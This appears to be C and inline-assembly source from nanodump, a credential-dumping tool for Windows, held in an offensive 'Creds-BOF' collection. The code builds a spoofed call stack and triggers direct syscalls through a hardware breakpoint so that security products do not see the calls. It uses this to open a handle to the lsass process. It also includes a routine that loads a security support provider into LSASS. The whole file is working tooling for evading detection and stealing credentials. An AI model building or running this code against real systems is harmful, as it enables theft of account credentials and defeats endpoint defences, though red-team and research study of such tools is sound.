            // "Because of the constraints on epilogs, UWOP_PUSH_NONVOL
            // unwind codes must appear first in the prolog and
            // correspondingly, last in the unwind code array."
            // Hence, subtract the push rbp code index from the
            // total count to work out when it is pushed onto stack.
            // E.g. diff will be 1 below, so rsp -= 0x8 then write childSP:
            // RPCRT4!LrpcIoComplete:
            // 00007ffd`b342b480 4053            push    rbx
            // 00007ffd`b342b482 55              push    rbp
            // 00007ffd`b342b483 56              push    rsi
            // If diff == 0, rbp is pushed first etc.
            DWORD diff = stackFrame->countOfCodes - stackFrame->pushRbpIndex;
            DWORD tmpStackSizeCounter = 0;
            for (ULONG j = 0; j < diff; j++)
            {
                // e.g. push rbx
                push_to_stack(stack_info, 0x0);
                tmpStackSizeCounter += 0x8;
            }
            // push rbp
            push_to_stack(stack_info, (ULONG_PTR)from_fake_to_real(stack_info, (PVOID)childSp));

            // [2.3] Minus off the remaining function stack size
            // and continue unwinding.
            stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - (stackFrame->totalStackSize - (tmpStackSizeCounter + 0x8)));
            *(PVOID*)(stack_info->fake_stack_rsp) = stackFrame->returnAddress;

            // update RBP
            stack_info->fake_stack_rbp = RVA(PVOID, stack_info->fake_stack_rsp, - 0x8);

            // [2.4] From my testing it seems you only need to get rbp
            // right for the next available frame in the chain which pushes it.
            // Hence, there can be a frame in between which does not push rbp.
            // Ergo set this to false once you have resolved rbp for frame
            // which needed it. This is pretty flimsy though so this assumption
            // may break for other more complicated examples.
            bPreviousFrameSetUWOP_SET_FPREG = FALSE;
        }
        else
        {
            // [3] If normal frame, decrement total stack size
            // and write RET address.
            stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - stackFrame->totalStackSize);
            *(PVOID*)(stack_info->fake_stack_rsp) = stackFrame->returnAddress;

            // update RBP
            stack_info->fake_stack_rbp = RVA(PVOID, stack_info->fake_stack_rsp, - 0x8);
        }

        // [4] Check if the current function sets frame pointer
        // when unwinding e.g. mov rsp,rbp / UWOP_SET_FPREG
        // and record its childSP.
        if (stackFrame->setsFramePointer)
        {
            childSp = (ULONG_PTR)stack_info->fake_stack_rsp;
            childSp += 0x8;
            bPreviousFrameSetUWOP_SET_FPREG = TRUE;
        }
    }
}

#else

VOID initialize_fake_thread_state(
    PSTACK_FRAME callstack,
    DWORD number_of_frames,
    PSTACK_INFO stack_info)
{
    PSTACK_FRAME stackFrame = NULL;
    stack_info->fake_stack_rbp = NULL;

    // As an extra sanity check explicitly clear
    // the last RET address to stop any further unwinding.
    push_to_stack(stack_info, 0);

    for (DWORD i = 0; i < number_of_frames; i++)
    {
        // loop from the last to the first
        stackFrame = &callstack[number_of_frames - i - 1];

        // if the frame is not valid, simply ignore it
        if (!stackFrame->is_valid)
            continue;

        // push the value for EBP
        push_to_stack(stack_info, (ULONG_PTR)from_fake_to_real(stack_info, stack_info->fake_stack_rbp));

        // update RBP
        stack_info->fake_stack_rbp = stack_info->fake_stack_rsp;

        // add the size of the stack frame to the stack
        stack_info->fake_stack_rsp -= stackFrame->totalStackSize - 0x4;

        // write the return address
        *(PVOID*)(stack_info->fake_stack_rsp) = stackFrame->returnAddress;
    }
}

#endif

#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) PVOID get_rip(VOID)
{
    __asm {
        mov eax, [esp]
        ret
    }
}

__declspec(naked) PVOID get_rsp(VOID)
{
    __asm {
        SET_SYNTAX
        lea eax, [esp+0x4]
        ret
    }
}

#elif defined(__GNUC__)

__declspec(naked) PVOID get_rip(VOID)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov rax, [rsp] \n"
        "ret \n"
    );
#else
    asm(
        SET_SYNTAX
        "mov eax, [esp] \n"
        "ret \n"
    );
#endif
}

__declspec(naked) PVOID get_rsp(VOID)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "lea rax, [rsp+0x8] \n"
        "ret \n"
    );
#else
    asm(
        SET_SYNTAX
        "lea eax, [esp+0x4] \n"
        "ret \n"
    );
#endif
}

#endif

#ifdef _WIN64

VOID lookup_function_table(
    IN PVOID ControlPc,
    OUT PVOID* pImageBase,
    OUT PRUNTIME_FUNCTION* runtime_function,
    OUT PULONG32 size)
{
    PIMAGE_DOS_HEADER dos = find_dll_by_pointer(ControlPc);
    if (!dos)
        return;

    PIMAGE_NT_HEADERS nt = RVA(PIMAGE_NT_HEADERS, dos, dos->e_lfanew);
    ULONG32 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].VirtualAddress;
    ULONG32 Size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION].Size;
    if (Size)
    {
        *pImageBase = dos;
        *size = Size / sizeof(RUNTIME_FUNCTION);
        *runtime_function = RVA(PRUNTIME_FUNCTION, dos, rva);
    }
    else
    {
        *size = 0;
        *runtime_function = NULL;
        DPRINT_ERR("the module at 0x%p has no exception directory", dos);
    }
}

BOOL lookup_function_entry(
    IN ULONG_PTR ControlPc,
    PRUNTIME_FUNCTION* pFunctionEntry,
    PVOID* pImageBase)
{
    PRUNTIME_FUNCTION FunctionEntry;
    ULONG IndexLo, IndexHi, IndexMid;
    PVOID ImageBase = 0;
    PRUNTIME_FUNCTION FunctionTable = NULL;
    ULONG32 TableLength = 0;

    lookup_function_table(
        (PVOID)ControlPc,
        &ImageBase,
        &FunctionTable,
        &TableLength);
    if (!FunctionTable)
        return FALSE;

    /* Use relative virtual address */
    ControlPc -= (ULONG_PTR)ImageBase;

    /* Do a binary search */
    IndexLo = 0;
    IndexHi = TableLength;
    while (IndexHi > IndexLo)
    {
        IndexMid = (IndexLo + IndexHi) / 2;
        FunctionEntry = &FunctionTable[IndexMid];

        if (ControlPc < FunctionEntry->BeginAddress)
        {
            /* Continue search in lower half */
            IndexHi = IndexMid;
        }
        else if (ControlPc >= FunctionEntry->EndAddress)
        {
            /* Continue search in upper half */
            IndexLo = IndexMid + 1;
        }
        else
        {
            /* ControlPc is within limits, return entry */
            *pFunctionEntry = FunctionEntry;
            *pImageBase = ImageBase;
            return TRUE;
        }
    }

    /* Nothing found, return NULL */
    PRINT_ERR("the function at 0x%p is a leaf function, try another one.", RVA(PVOID, ImageBase, ControlPc));
    return FALSE;
}

#endif

#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) PNT_TIB get_tib(VOID)
{
    __asm{
        mov eax, 0x18
        mov eax, fs:[eax]
        ret
    }
}

#elif defined(__GNUC__)

__declspec(naked) PNT_TIB get_tib(VOID)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov eax, 0x30 \n"
        "mov rax, gs:[rax] \n"
        "ret \n"
    );
#else
    asm(
        SET_SYNTAX
        "mov eax, 0x18 \n"
        "mov eax, fs:[eax] \n"
        "ret \n"
    );
#endif
}

#endif

BOOL create_fake_callstack(
    PSTACK_INFO stack_info,
    ULONG32 function_hash)
{
    BOOL ret_val = FALSE;
    PSTACK_FRAME callstack = NULL;
    DWORD number_of_frames = 0;
    ULONG64 stack_space_needed = 0;
    PVOID real_stack_backup = NULL;
    PVOID fake_stack_heap_addr = NULL;
    PVOID target_stack_top = NULL;
#if defined(DEBUG) && !defined(PPL_MEDIC)
    PVOID target_stack_bottom = NULL;
#endif
    PVOID full_stack_base = NULL;
    ULONG64 full_stack_size = 0;
    ULONG32 values_stored_after_canary = 7;
    ULONG32 empty_space = 0;
    PVOID storing_area = NULL;
    PNT_TIB tib = NULL;
#ifdef _WIN64
    ULONG32 ptr_size = 8;
    ULONG_PTR canary_value = 0xDEADBEEFCAFEBABE;
#else
    ULONG32 ptr_size = 4;
    ULONG_PTR canary_value = 0xDEADBEEF;
#endif

    // get the address and size of the stack
    tib = (PNT_TIB)get_tib();
    full_stack_base = tib->StackLimit;
    full_stack_size = (ULONG_PTR)tib->StackBase - (ULONG_PTR)tib->StackLimit;
    DPRINT("obtained the stack ranges: 0x%p - 0x%p", tib->StackLimit, tib->StackBase);

    callstack = intAlloc(sizeof(STACK_FRAME) * MAX_FRAME_NUM);
    if (!callstack)
    {
        malloc_failed();
        goto cleanup;
    }

    // you can have a different stack layout for each syscall
    switch (function_hash)
    {
        case NtOpenProcess_SW2_HASH:
            DPRINT("using the NtOpenProcess call stack");
            set_ntopenprocess_callstack(callstack, &number_of_frames);
            break;
        default:
            DPRINT("using the default call stack");
            set_default_callstack(callstack, &number_of_frames);
            break;
    }

    if (number_of_frames > MAX_FRAME_NUM)
    {
        PRINT_ERR("too many frames!");
        goto cleanup;
    }

    /*
     * Initialise our target call stack to spoof. This
     * will load any required dlls, calculate ret addresses,
     * and individual stack sizes needed to mimic the call stack.
     */
    initialize_spoofed_callstack(
        callstack,
        number_of_frames);

    storing_area = intAlloc(ptr_size * values_stored_after_canary);
    DPRINT("storing area is at: 0x%p", storing_area);
    if (!storing_area)
    {
        malloc_failed();
        goto cleanup;
    }

    // calculate how much space do we need to fit the fake stack
    // add space for the first ret addr
    stack_space_needed += ptr_size;
    for (int i = 0; i < number_of_frames; ++i)
    {
        if (callstack[i].is_valid)
            stack_space_needed += callstack[i].totalStackSize;
    }
    // add space for the canary
    stack_space_needed += ptr_size;
    // add space for the address of the storing area
    stack_space_needed += ptr_size;
    // add unsued bytes at the bottom of the fake stack
    // so that when saving RIP we don't write outside the stack's lower bound

    // make sure the stack is kept 16 bytes alligned
    if ((stack_space_needed & ptr_size) == ptr_size)
        empty_space = ptr_size * 2;
    else
        empty_space = ptr_size;
    stack_space_needed += empty_space;

    DPRINT("size of the fake stack: 0x%llx", stack_space_needed);

    // allocate space where the fake stack will be created
    fake_stack_heap_addr = intAlloc(stack_space_needed);
    DPRINT("fake stack on the heap: 0x%p - 0x%p", fake_stack_heap_addr, RVA(PVOID, fake_stack_heap_addr, stack_space_needed));
    if (!fake_stack_heap_addr)
    {
        malloc_failed();
        goto cleanup;
    }

    // allocate space where the real stack will be stored
    real_stack_backup = intAlloc(full_stack_size);
    DPRINT("backup of the stack real stack: 0x%p - 0x%p", real_stack_backup, RVA(PVOID, real_stack_backup, full_stack_size));
    if (!real_stack_backup)
    {
        malloc_failed();
        goto cleanup;
    }

#if defined(DEBUG) && !defined(PPL_MEDIC)
    target_stack_bottom = RVA(PVOID, full_stack_base, full_stack_size);
#endif
    target_stack_top = RVA(PVOID, full_stack_base, full_stack_size - stack_space_needed);

    DPRINT("the spoofed call stack will be stored at: 0x%p - 0x%p", target_stack_top, target_stack_bottom);

    // get the address of the first return address
    // this is used for calling APIs with a fake callstack
    for (int i = 0; i < number_of_frames; ++i)
    {
        if (callstack[i].is_valid && callstack[i].returnAddress)
        {
            stack_info->first_ret_addr = callstack[i].returnAddress;
            break;
        }
    }

    // the fake stack will be constructed on the heap
    // then it will be moved to the bottom of the real stack
    stack_info->full_stack_base = full_stack_base;
    stack_info->full_stack_size = full_stack_size;
    stack_info->full_stack_backup_addr = real_stack_backup;
    stack_info->fake_stack_heap_addr = fake_stack_heap_addr;
    stack_info->fake_stack_size = stack_space_needed;
    stack_info->fake_stack_target_addr = target_stack_top;
    stack_info->fake_stack_rsp = RVA(PVOID, stack_info->fake_stack_heap_addr, stack_info->fake_stack_size);
    stack_info->storing_area = storing_area;

    /*
     * layout:
     * 0x0000 top of the stack
     * - <fake call stack>
     * - canary
     * - storing_area
     * - <unused>
     * 0xffff stack bottom
     *
     * storing_area:
     * - full_stack_size
     * - full_stack_backup_addr
     * - full_stack_base
     * - RBX
     * - RBP
     * - RSP
     * - RIP
    */

    // save some bytes that will be left unused
    stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - empty_space);
    // save space for the address of the storing area
    stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - ptr_size);
    // write the storing area pointer
    *((PVOID*)stack_info->fake_stack_rsp) = storing_area;
    // save space for the canary
    stack_info->fake_stack_rsp = (PVOID)((ULONG_PTR)stack_info->fake_stack_rsp - ptr_size);
    // write the canary
    *((PVOID*)stack_info->fake_stack_rsp) = (PVOID)canary_value;

    stack_info->canary_addr = stack_info->fake_stack_rsp;

    // Initialise fake thread state.
    initialize_fake_thread_state(
        callstack,
        number_of_frames,
        stack_info);

    // 'translate' the addresses of the RSP, RBP and the canary
    stack_info->fake_stack_rsp = from_fake_to_real(stack_info, stack_info->fake_stack_rsp);
    stack_info->fake_stack_rbp = from_fake_to_real(stack_info, stack_info->fake_stack_rbp);
    stack_info->canary_addr = from_fake_to_real(stack_info, stack_info->canary_addr);

    DPRINT("fake stack layout:")
    DPRINT("    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~");
    BOOL is_first = TRUE;
    for (int i = 0; i < number_of_frames; ++i)
    {
        if (callstack[i].is_valid)
        {
            if (is_first)
            {
                if (callstack[i].function_name[0])
                {
                    DPRINT("    ret address: %ls!%s+0x%x <-- stack pointer: 0x%p", callstack[i].target_dll_name, callstack[i].function_name, callstack[i].final_offset, stack_info->fake_stack_rsp);
                }
                else
                {
                    DPRINT("    ret address: %ls+0x%x <-- stack pointer: 0x%p", callstack[i].target_dll_name, callstack[i].final_offset, stack_info->fake_stack_rsp);
                }
            }
            else
            {
                if (callstack[i].function_name[0])
                {
                    DPRINT("    ret address: %ls!%s+0x%x", callstack[i].target_dll_name, callstack[i].function_name, callstack[i].final_offset);
                }
                else
                {
                    DPRINT("    ret address: %ls+0x%x", callstack[i].target_dll_name, callstack[i].final_offset);
                }
            }
            DPRINT("    -------------------------------");
            DPRINT("        <0x%lx bytes of space>", callstack[i].totalStackSize - ptr_size);
            is_first = FALSE;
        }
    }
    DPRINT("    ret address: 0x%p", NULL);
    DPRINT("    -------------------------------");
    DPRINT("    canary: 0x%p", (PVOID)canary_value);
    DPRINT("    storing ptr: 0x%p", stack_info->storing_area);
    DPRINT("        <0x%x bytes of space>       <-- stack bottom: 0x%p", empty_space, full_stack_base);
    DPRINT("    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~");

    ret_val = TRUE;

cleanup:
    if (!ret_val && fake_stack_heap_addr)
        intFree(fake_stack_heap_addr);
    if (!ret_val && real_stack_backup)
        intFree(real_stack_backup);
    if (!ret_val && storing_area)
        intFree(storing_area);
    if (callstack)
        intFree(callstack);

    return ret_val;
}

/*
 * This function is responsible for:
 * 1) create the backup of the stack
 * 2) copy over the fake stack
 * 3) save all the information required by the handler
 * 4) set all the parameters
 * 5) set RSP and RBP to the fake callstack
 * 6) set the syscall number
 * 7) jump to the syscall address
 */

#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) ULONG_PTR jumper(
    PVOID syscall_data)
{
    __asm {
        // ecx: syscall_data
        mov ecx, [esp+0x04]
        // backup the full stack
        xor eax, eax
        // edx: full_stack_size
        mov edx, [ecx+0x04]
        // edi: full_stack_backup_addr
        mov edi, [ecx+0x08]
        // esi: full_stack_base
        mov esi, [ecx]
        bkp_stack_loop:
        mov bl, [esi+eax]
        mov [edi+eax], bl
        inc eax
        cmp eax, edx
        jne bkp_stack_loop
        // copy the fake stack
        xor eax, eax
        // esi: fake_stack_heap_addr
        mov esi, [ecx+0x0c]
        // edi: fake_stack_target_addr
        mov edi, [ecx+0x14]
        // edx: fake_stack_size
        mov edx, [ecx+0x10]
        cpy_fake_stack_loop:
        mov bl, [esi+eax]
        mov [edi+eax], bl
        inc eax
        cmp eax, edx
        jne cpy_fake_stack_loop
        // save full_stack_size, full_stack_backup_addr, full_stack_base,
        // EBX, EBP, ESP and EIP in the storing_area
        // eax: canary_addr
        mov eax, [ecx+0x20]
        // eax: storing_area
        mov eax, [eax+0x04]
        // full_stack_size
        mov edx, [ecx+0x04]
        mov [eax+0x00], edx
        // full_stack_backup_addr
        mov edx, [ecx+0x08]
        mov [eax+0x04], edx
        // full_stack_base
        mov edx, [ecx]
        mov [eax+0x08], edx
        // RBX
        mov [eax+0x0c], ebx
        // RBP
        mov [eax+0x10], ebp
        // RSP
        pop edx
        mov [eax+0x14], esp
        // RIP
        mov [eax+0x18], edx
        // set the parameters
        // eax: num_params
        mov eax, [ecx+0x34]
        // ebp: fake_stack_rsp
        mov ebp, [ecx+0x18]
        // edx: is_api_call
        mov edx, [ecx+0x2c]
        cmp edx, 0x0
        jne stack_params_loop
        // syscalls in x86 have a different stack layout
        // 1) address of the 'ret' instruction next to the sysenter
        // 2) the actual return address
        // 3) parameters
        // save the real return address in the second position
        // edx: ret addr
        mov edx, [ebp]
        mov [ebp+0x4], edx
        // save the address of the 'ret' instruction in the first position
        // edx: syscall address
        mov edx, [ecx+0x24]
        // edx: address of the 'ret' instruction
        add edx, 0x2
        mov [ebp], edx
        // save the parameters on the third and not second position
        add ebp, 0x4
        // edx: is_wow64
        mov edx, [ecx+0x30]
        cmp edx, 0x0
        je stack_params_loop
        // syscalls in WoW64 have a different stack layout
        // 1) the actual return address
        // 2) 0x4 bytes of space
        // 3) parameters
        mov edx, [ebp]
        mov [ebp-0x4], edx
        stack_params_loop:
        cmp eax, 0x1
        jl params_ready
        mov ebx, [ecx+0x34+eax*0x4]
        mov [ebp+eax*0x4], ebx
        dec eax
        jmp stack_params_loop
        params_ready:
        // set the RSP
        mov esp, [ecx+0x18]
        // set the RBP
        mov ebp, [ecx+0x1c]
        // set the syscall number
        mov eax, [ecx+0x28]
        // ebx: syscall_addr
        mov ebx, [ecx+0x24]
        // edx must to be equal to esp for some reason
        mov edx, esp
        // jump to the syscall address :^)
        jmp ebx
    }
}

#elif defined(__GNUC__)

__declspec(naked) ULONG_PTR jumper(
    PVOID syscall_data)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        // save the return address
        "pop r11 \n"
        // backup the full stack
        "xor rax, rax \n"
        // rdx: full_stack_size
        "mov rdx, [rcx+0x08] \n"
        // r8: full_stack_backup_addr
        "mov r8, [rcx+0x10] \n"
        // r9: full_stack_base
        "mov r9, [rcx] \n"
        "bkp_stack_loop: \n"
        "mov r10b, [r9+rax] \n"
        "mov [r8+rax], r10b \n"
        "inc rax \n"
        "cmp rax, rdx \n"
        "jne bkp_stack_loop \n"
        // copy the fake stack
        "xor rax, rax \n"
        // r8: fake_stack_heap_addr
        "mov r8, [rcx+0x18] \n"
        // r9: fake_stack_target_addr
        "mov r9, [rcx+0x28] \n"
        // rdx: fake_stack_size
        "mov rdx, [rcx+0x20] \n "
        "cpy_fake_stack_loop: \n"
        "mov r10b, [r8+rax] \n"
        "mov [r9+rax], r10b \n"
        "inc rax \n"
        "cmp rax, rdx \n"
        "jne cpy_fake_stack_loop \n"
        // save full_stack_size, full_stack_backup_addr, full_stack_base,
        // RBX, RBP, RSP and RIP after the canary
        // rax: canary_addr
        "mov rax, [rcx+0x40] \n"
        // rax: storing_area
        "mov rax, [rax+0x08] \n"
        // full_stack_size
        "mov rdx, [rcx+0x08] \n"
        "mov [rax+0x00], rdx \n"
        // full_stack_backup_addr
        "mov rdx, [rcx+0x10] \n"
        "mov [rax+0x08], rdx \n"
        // full_stack_base
        "mov rdx, [rcx] \n"
        "mov [rax+0x10], rdx \n"
        // RBX
        "mov [rax+0x18], rbx \n"
        // RBP
        "mov [rax+0x20], rbp \n"
        // RSP
        "mov [rax+0x28], rsp \n"
        // RIP
        "mov [rax+0x30], r11 \n"
        // set the parameters
        // are there more than 0 params?
        "xor rax, rax \n"
        // eax: num_params
        "mov eax, [rcx+0x5c] \n"
        // r10: syscall_data
        "mov r10, rcx \n"
        "cmp eax, 0x1 \n"
        "jl params_ready \n"
        // set parameter 1
        "mov rcx, [r10+0x60] \n"
        // is there more than 1 param?
        "cmp eax, 0x2 \n"
        "jl params_ready \n"
        // set parameter 2
        "mov rdx, [r10+0x68] \n"
        // are there more than 2 params?
        "cmp eax, 0x3 \n"
        "jl params_ready \n"
        // set parameter 3
        "mov r8, [r10+0x70] \n"
        // are there more than 3 params?
        "cmp eax, 0x4 \n"
        "jl params_ready \n"
        // set parameter 4
        "mov r9, [r10+0x78] \n"
        // set the rest of the parameters
        "sub eax, 0x4 \n"
        // rbp: fake_stack_rsp
        "mov rbp, [r10+0x30] \n"
        "stack_params_loop: \n"
        "cmp eax, 0x1 \n"
        "jl params_ready \n"
        "mov rbx, [r10+0x78+rax*0x8] \n"
        "mov [rbp+0x20+rax*0x8], rbx \n"
        "dec rax \n"
        "jmp stack_params_loop \n"
        "params_ready: \n"
        // set the RSP
        "mov rsp, [r10+0x30] \n"
        // set the RBP
        "mov rbp, [r10+0x38] \n"
        // set the syscall number
        "mov eax, [r10+0x50] \n"
        // r11: syscall_addr
        "mov r11, [r10+0x48] \n"
        // r10 must be equal to rcx for some reason
        "mov r10, rcx \n"
        // jump to the syscall address :^)
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        // ecx: syscall_data
        "mov ecx, [esp+0x04] \n"
        // backup the full stack
        "xor eax, eax \n"
        // edx: full_stack_size
        "mov edx, [ecx+0x04] \n"
        // edi: full_stack_backup_addr
        "mov edi, [ecx+0x08] \n"
        // esi: full_stack_base
        "mov esi, [ecx] \n"
        "bkp_stack_loop: \n"
        "mov bl, [esi+eax] \n"
        "mov [edi+eax], bl \n"
        "inc eax \n"
        "cmp eax, edx \n"
        "jne bkp_stack_loop \n"
        // copy the fake stack
        "xor eax, eax \n"
        // esi: fake_stack_heap_addr
        "mov esi, [ecx+0x0c] \n"
        // edi: fake_stack_target_addr
        "mov edi, [ecx+0x14] \n"
        // edx: fake_stack_size
        "mov edx, [ecx+0x10] \n "
        "cpy_fake_stack_loop: \n"
        "mov bl, [esi+eax] \n"
        "mov [edi+eax], bl \n"
        "inc eax \n"
        "cmp eax, edx \n"
        "jne cpy_fake_stack_loop \n"
        // save full_stack_size, full_stack_backup_addr, full_stack_base,
        // EBX, EBP, ESP and EIP in the storing_area
        // eax: canary_addr
        "mov eax, [ecx+0x20] \n"
        // eax: storing_area
        "mov eax, [eax+0x04] \n"
        // full_stack_size
        "mov edx, [ecx+0x04] \n"
        "mov [eax+0x00], edx \n"
        // full_stack_backup_addr
        "mov edx, [ecx+0x08] \n"
        "mov [eax+0x04], edx \n"
        // full_stack_base
        "mov edx, [ecx] \n"
        "mov [eax+0x08], edx \n"
        // RBX
        "mov [eax+0x0c], ebx \n"
        // RBP
        "mov [eax+0x10], ebp \n"
        // RSP
        "pop edx \n"
        "mov [eax+0x14], esp \n"
        // RIP
        "mov [eax+0x18], edx \n"
        // set the parameters
        // eax: num_params
        "mov eax, [ecx+0x34] \n"
        // ebp: fake_stack_rsp
        "mov ebp, [ecx+0x18] \n"
        // edx: is_api_call
        "mov edx, [ecx+0x2c] \n"
        "cmp edx, 0x0 \n"
        "jne stack_params_loop \n"
        // syscalls in x86 have a different stack layout
        // 1) address of the 'ret' instruction next to the sysenter
        // 2) the actual return address
        // 3) parameters
        // save the real return address in the second position
        // edx: ret addr
        "mov edx, [ebp] \n"
        "mov [ebp+0x4], edx \n"
        // save the address of the 'ret' instruction in the first position
        // edx: syscall address
        "mov edx, [ecx+0x24] \n"
        // edx: address of the 'ret' instruction
        "add edx, 0x2 \n"
        "mov [ebp], edx \n"
        // save the parameters on the third and not second position
        "add ebp, 0x4 \n"
        // edx: is_wow64
        "mov edx, [ecx+0x30] \n"
        "cmp edx, 0x0 \n"
        "je stack_params_loop \n"
        // syscalls in WoW64 have a different stack layout
        // 1) the actual return address
        // 2) 0x4 bytes of space
        // 3) parameters
        "mov edx, [ebp] \n"
        "mov [ebp-0x4], edx \n"
        "stack_params_loop: \n"
        "cmp eax, 0x1 \n"
        "jl params_ready \n"
        "mov ebx, [ecx+0x34+eax*0x4] \n"
        "mov [ebp+eax*0x4], ebx \n"
        "dec eax \n"
        "jmp stack_params_loop \n"
        "params_ready: \n"
        // set the RSP
        "mov esp, [ecx+0x18] \n"
        // set the RBP
        "mov ebp, [ecx+0x1c] \n"
        // set the syscall number
        "mov eax, [ecx+0x28] \n"
        // ebx: syscall_addr
        "mov ebx, [ecx+0x24] \n"
        // edx must to be equal to esp for some reason
        "mov edx, esp \n"
        // jump to the syscall address :^)
        "jmp ebx \n"
    );
#endif
}

#endif

/*
 * This function is responsible for:
 * 1) get the address and number of the syscall
 * 2) create fake call stack
 * 3) set the hardware breakpoint
 * 4) call the jumper
 * 5) unset the hardware breakpoint
 */
NTSTATUS trigger_syscall(
    IN ULONG32 syscall_hash,
    IN ULONG32 num_params,
    ...)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    STACK_INFO stack_info = { 0 };
    PVOID syscall_addr = NULL;
    PVOID ret_addr = NULL;
    ULONG32 syscall_number = 0;
    HANDLE hHwBpHandler = NULL;
    BOOL success = FALSE;
    PSYSCALL_DATA syscall_data = NULL;
    va_list valist;

    va_start(valist, num_params);

    // get the syscall address
    syscall_addr = SW3_GetSyscallAddress(syscall_hash);
    if (!syscall_addr)
        goto cleanup;

    // get the syscall number
    syscall_number = SW2_GetSyscallNumber(syscall_hash);
    if (!syscall_number)
        goto cleanup;

    // create the fake callstack
    success = create_fake_callstack(&stack_info, syscall_hash);
    if (!success)
        goto cleanup;
    DPRINT("created the fake callstack");

    // get the first ret address in the fake callstack
    ret_addr = stack_info.first_ret_addr;
    if (!ret_addr)
    {
        // if there is none, use the 'ret' instruction after the syscall
        ret_addr = SW2_RVA2VA(PVOID, syscall_addr, 2);
    }

    // set the hardware breakpoint at the ret addr
    success = set_hwbp(ret_addr, &hHwBpHandler);
    if (!success)
        goto cleanup;
    DPRINT("hardware breakpoint set at 0x%p", ret_addr);

    // because the syscall data is on the heap,
    // overwriting the stack won't affect it
    syscall_data = intAlloc(sizeof(SYSCALL_DATA));
    if (!syscall_data)
    {
        malloc_failed();
        goto cleanup;
    }

    syscall_data->full_stack_base = stack_info.full_stack_base;
    syscall_data->full_stack_size = stack_info.full_stack_size;
    syscall_data->full_stack_backup_addr = stack_info.full_stack_backup_addr;
    syscall_data->fake_stack_heap_addr = stack_info.fake_stack_heap_addr;
    syscall_data->fake_stack_size = stack_info.fake_stack_size;
    syscall_data->fake_stack_target_addr = stack_info.fake_stack_target_addr;
    syscall_data->fake_stack_rsp = stack_info.fake_stack_rsp;
    syscall_data->fake_stack_rbp = stack_info.fake_stack_rbp;
    syscall_data->canary_addr = stack_info.canary_addr;
    syscall_data->is_api_call = FALSE;
    syscall_data->is_wow64 = local_is_wow64();
    syscall_data->syscall_addr = syscall_addr;
    syscall_data->syscall_number = syscall_number;
    syscall_data->num_params = num_params;
    for (int i = 0; i < num_params; ++i)
    {
        syscall_data->params[i] = va_arg(valist, ULONG_PTR);
    }

    DPRINT("triggering the syscall...");
    status = (NTSTATUS)jumper(syscall_data);
    DPRINT("done.");

cleanup:
    if (syscall_data)
        intFree(syscall_data);
    if (stack_info.full_stack_backup_addr)
        intFree(stack_info.full_stack_backup_addr);
    if (stack_info.fake_stack_heap_addr)
        intFree(stack_info.fake_stack_heap_addr);
    if (stack_info.storing_area)
        intFree(stack_info.storing_area);
    if (hHwBpHandler)
        unset_hwbp(hHwBpHandler);
    va_end(valist);

    return status;
}

HANDLE open_handle_with_spoofed_callstack(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes)
{
    NTSTATUS status   = STATUS_UNSUCCESSFUL;
    HANDLE   hProcess = NULL;

    // variables passed by reference must be stored on the heap
    PHANDLE            HProcessHandle    = intAlloc(sizeof(HANDLE));
    POBJECT_ATTRIBUTES HObjectAttributes = intAlloc(sizeof(OBJECT_ATTRIBUTES));
    CLIENT_ID*         HClientId         = intAlloc(sizeof(CLIENT_ID));

    if (!HProcessHandle || !HObjectAttributes || !HClientId)
    {
        malloc_failed();
        return NULL;
    }

    *HProcessHandle = NULL;

    InitializeObjectAttributes(HObjectAttributes, NULL, attributes, NULL, NULL);

    HClientId->UniqueProcess = (HANDLE)(ULONG_PTR)lsass_pid;
    HClientId->UniqueThread = 0;

    status = trigger_syscall(
        NtOpenProcess_SW2_HASH,
        4,
        HProcessHandle,
        permissions,
        HObjectAttributes,
        HClientId);

    hProcess = *HProcessHandle;

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenProcess", status);
        hProcess = NULL;
    }

    DATA_FREE(HProcessHandle,    sizeof(HANDLE));
    DATA_FREE(HObjectAttributes, sizeof(OBJECT_ATTRIBUTES));
    DATA_FREE(HClientId,         sizeof(CLIENT_ID));

    return hProcess;
}


================================================
FILE: Creds-BOF/nanodump/source/ssp/ssp.c
================================================
#include "ssp/ssp.h"
#include "ssp/ssp_utils.h"

DWORD WINAPI load_ssp(LPVOID Parameter)
{
    LPSTR ssp_path = (LPSTR)Parameter;
    AddSecurityPackageW_t AddSecurityPackageW;
    wchar_t ssp_path_w[MAX_PATH];

    if (!is_full_path(ssp_path))
    {
        PRINT_ERR("You must provide a full path: %s", ssp_path);
        return 1;
    }
    // find the address of AddSecurityPackageW dynamically
    AddSecurityPackageW = (AddSecurityPackageW_t)(ULONG_PTR)get_function_address(
        get_library_address(SSPICLI_DLL, TRUE),
        AddSecurityPackageW_SW2_HASH,
        0);
    if (!AddSecurityPackageW)
    {
        api_not_found("AddSecurityPackageW");
        return 1;
    }

    mbstowcs(ssp_path_w, ssp_path, MAX_PATH);

    //DPRINT("Loading %s into " LSASS, ssp_path);

    SECURITY_PACKAGE_OPTIONS spo = {0};
    NTSTATUS status = AddSecurityPackageW(ssp_path_w, &spo);

#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || PASS_PARAMS_VIA_NAMED_PIPES == 0
    if (status == SEC_E_SECPKG_NOT_FOUND)
    {
        PRINT("Done, status: SEC_E_SECPKG_NOT_FOUND, this is normal if DllMain returns FALSE");
        return 0;
    }
    else
    {
        PRINT("Done, status: 0x%lx", status);
        return 1;
